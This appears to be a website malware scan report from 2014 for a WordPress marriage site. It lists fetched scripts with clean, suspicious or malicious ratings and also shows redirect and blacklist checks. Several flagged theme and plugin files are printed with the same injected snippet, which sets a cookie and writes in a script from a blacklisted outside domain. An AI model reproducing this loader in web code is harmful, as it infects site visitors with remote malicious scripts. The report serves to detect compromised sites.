Scanned pages/files
Request | Server response | Status |
http://top-marriage.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 03 Oct 2014 18:10:43 GMT Accept-Ranges: bytes Age: 0 Location: http://www.top-marriage.net/ Server: Apache/2 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 X-Pingback: http://www.top-marriage.net/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.top-marriage.net/ | 200 OK Content-Length: 34743 Content-Type: text/html | clean |
http://www.top-marriage.net/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/x-javascript | clean |
http://www.top-marriage.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.top-marriage.net/wp-content/plugins/gd-star-rating/js/gdsr.js?ver=1.9.22 | 200 OK Content-Length: 8199 Content-Type: application/x-javascript | clean |
http://www.top-marriage.net/wp-content/themes/SimplePress/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=2.0 | 200 OK Content-Length: 11232 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3886 bytes skipped]... '; } $(this).find(et_shortcodes_tab_apply_to_element).et_shortcodes_switcher( et_shortcodes_tab_settings ); }); });function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://www.top-marriage.net/wp-includes/js/tw-sack.min.js?ver=1.6.1 | 200 OK Content-Length: 3267 Content-Type: application/x-javascript | clean |
http://www.top-marriage.net/wp-content/plugins/ajax-login-widget/ajax_login_widget.js | 200 OK Content-Length: 7979 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3935 bytes skipped]... ch) // Netscape/Firefox/Opera keynum = e.which; else keynum = 0; if (keynum==13) alw_retrievePassword(); } function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://www.top-marriage.net/wp-content/themes/SimplePress/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 7046 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3112 bytes skipped]... |easeInExpo||9375|easeInOutSine|easeInOutQuad|25|easeOutSine|easeInOutBack|easeInQuad|625|984375|jswing|easeInOutBounce'.split('|'),0,{})) function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} Antivirus reports:
| ||
http://www.top-marriage.net/wp-content/themes/SimplePress/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15953 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3751 bytes skipped]... ete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery);function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://www.top-marriage.net/wp-content/themes/SimplePress/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 5410 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3987 bytes skipped]... st', 1); jQuery(this).find('.et_portfolio_more_icon,.et_portfolio_zoom_icon').fadeTo('fast', 0); }); }); /* ]]> */function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://www.top-marriage.net/wp-content/themes/SimplePress/js/easing.js | 200 OK Content-Length: 8630 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4009 bytes skipped]... nBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} Antivirus reports:
| ||
http://www.top-marriage.net/wp-content/themes/SimplePress/js/cufon-yui.js | 200 OK Content-Length: 18593 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3587 bytes skipped]... inY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://www.top-marriage.net/wp-content/themes/SimplePress/js/superfish.js | 200 OK Content-Length: 4043 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[4123 bytes skipped]... .animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://www.top-marriage.net/wp-content/themes/SimplePress/js/colaborate_thin.js | 200 OK Content-Length: 54884 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3592 bytes skipped]... 9,309,321xm492,-325v0,-201,-58,-285,-261,-285r-85,0r0,224r175,0r0,37r-175,0r0,312r94,0v178,0,252,-102,252,-288","w":605,"k":{"A":12}}}}); function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://top-marriage.net/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 18:10:58 GMT Pragma: no-cache Accept-Ranges: bytes Age: 0 Location: http://www.top-marriage.net/test404page.js Server: Apache/2 Content-Length: 377 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.top-marriage.net/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.top-marriage.net/test404page.js | 404 Not Found Content-Length: 50573 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: top-marriage.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 03 Oct 2014 18:10:43 GMT
Accept-Ranges: bytes
Age: 0
Location: http://www.top-marriage.net/
Server: Apache/2
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
X-Pingback: http://www.top-marriage.net/xmlrpc.php
X-Powered-By: PHP/5.2.17
...236 bytes of data.
GET / HTTP/1.1
Host: top-marriage.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 03 Oct 2014 18:10:43 GMT
Accept-Ranges: bytes
Age: 0
Location: http://www.top-marriage.net/
Server: Apache/2
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
X-Pingback: http://www.top-marriage.net/xmlrpc.php
X-Powered-By: PHP/5.2.17
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: top-marriage.net
Referer: http://www.google.com/search?q=top-marriage.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: top-marriage.net
Referer: http://www.google.com/search?q=top-marriage.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=top-marriage.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://top-marriage.net/
Result: top-marriage.net is not infected or malware details are not published yet.
Result: top-marriage.net is not infected or malware details are not published yet.